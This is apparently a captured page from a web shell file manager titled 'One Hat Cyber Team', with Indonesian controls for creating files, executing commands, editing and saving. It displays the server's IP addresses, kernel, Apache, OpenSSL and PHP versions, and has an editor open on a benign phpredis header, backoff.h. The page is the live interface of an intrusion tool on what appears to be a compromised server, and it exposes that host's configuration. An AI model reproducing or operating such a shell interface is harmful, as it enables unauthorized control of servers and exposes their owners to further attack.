One Hat Cyber Team
Your IP :
172.69.130.199
Server IP :
188.114.97.3
Server :
Linux thuru 6.5.11-4-pve #1 SMP PREEMPT_DYNAMIC PMX 6.5.11-4 (2023-11-20T10:19Z) x86_64
Server Software :
Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
PHP Version :
7.3.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
src
/
redis-5.3.5RC1
/
Edit File:
backoff.h
#ifndef REDIS_BACKOFF_H #define REDIS_BACKOFF_H /* {{{ struct RedisBackoff */ struct RedisBackoff { unsigned int algorithm; /* index of algorithm function, returns backoff in microseconds*/ zend_ulong base; /* base backoff in microseconds */ zend_ulong cap; /* max backoff in microseconds */ zend_ulong previous_backoff; /* previous backoff in microseconds */ }; /* }}} */ void redis_initialize_backoff(struct RedisBackoff *self, unsigned long retry_interval); void redis_backoff_reset(struct RedisBackoff *self); zend_ulong redis_backoff_compute(struct RedisBackoff *self, unsigned int retry_index); #endif
Simpan